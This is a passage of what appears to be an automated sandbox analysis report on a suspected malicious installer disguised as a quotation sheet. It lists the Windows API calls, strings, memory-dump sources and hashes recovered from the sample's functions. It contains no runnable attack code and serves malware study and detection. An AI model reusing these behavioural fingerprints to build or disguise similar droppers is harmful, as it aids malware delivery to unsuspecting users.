                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte
                                                                                • API String ID: 123533781-3731622782
                                                                                • Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                                                • Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
                                                                                • Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                                                • Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                                                • Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
                                                                                • Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                                                • Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A
                                                                                APIs
                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404230
                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
                                                                                • GetSysColor.USER32(?), ref: 0040425F
                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
                                                                                • lstrlenA.KERNEL32(?), ref: 00404280
                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404306
                                                                                • SendMessageA.USER32(00000000), ref: 00404309
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404334
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00404383
                                                                                • SetCursor.USER32(00000000), ref: 0040438C
                                                                                • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
                                                                                • SetCursor.USER32(00000000), ref: 004043AF
                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: Call$N$\A@$open
                                                                                • API String ID: 3615053054-2472894765
                                                                                • Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
                                                                                • Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F
                                                                                • API String ID: 941294808-1304234792
                                                                                • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                                                • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                APIs
                                                                                • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
                                                                                • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
                                                                                • wsprintfA.USER32 ref: 00405C23
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
                                                                                • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405D0C
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13
                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                • API String ID: 222337774-4148678300
                                                                                • Opcode ID: 89de4d3d5a818e9388275d82155379b0538a157bfcc351b2c6990c4d01eb2e15
                                                                                • Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
                                                                                • Opcode Fuzzy Hash: 89de4d3d5a818e9388275d82155379b0538a157bfcc351b2c6990c4d01eb2e15
                                                                                • Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD
                                                                                APIs
                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                                                • CharPrevA.USER32(?,?,75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004060CF
                                                                                • *?|<>/":, xrefs: 00406116
                                                                                • "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe", xrefs: 0040610A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-3538342386
                                                                                • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                • Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
                                                                                • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                • Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 004040CC
                                                                                • GetSysColor.USER32(00000000), ref: 004040E8
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004040F4
                                                                                • SetBkMode.GDI32(?,?), ref: 00404100
                                                                                • GetSysColor.USER32(?), ref: 00404113
                                                                                • SetBkColor.GDI32(?,?), ref: 00404123
                                                                                • DeleteObject.GDI32(?), ref: 0040413D
                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404147
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                • Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
                                                                                • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                • Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55
                                                                                APIs
                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3730416702-0
                                                                                • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                APIs
                                                                                  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
                                                                                • GetTickCount.KERNEL32 ref: 00402C4D
                                                                                • wsprintfA.USER32 ref: 00402C7B
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402CAD
                                                                                  • Part of subcall function 00402BFB: MulDiv.KERNEL32(00076A73,00000064,00076AA2), ref: 00402C10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 722711167-2449383134
                                                                                • Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                                                • Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
                                                                                • Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                                                • Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
                                                                                • GetMessagePos.USER32 ref: 0040496A
                                                                                • ScreenToClient.USER32(?,?), ref: 00404984
                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                • Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
                                                                                • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                • Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                • wsprintfA.USER32 ref: 00402BCE
                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BDE
                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                • API String ID: 1451636040-1158693248
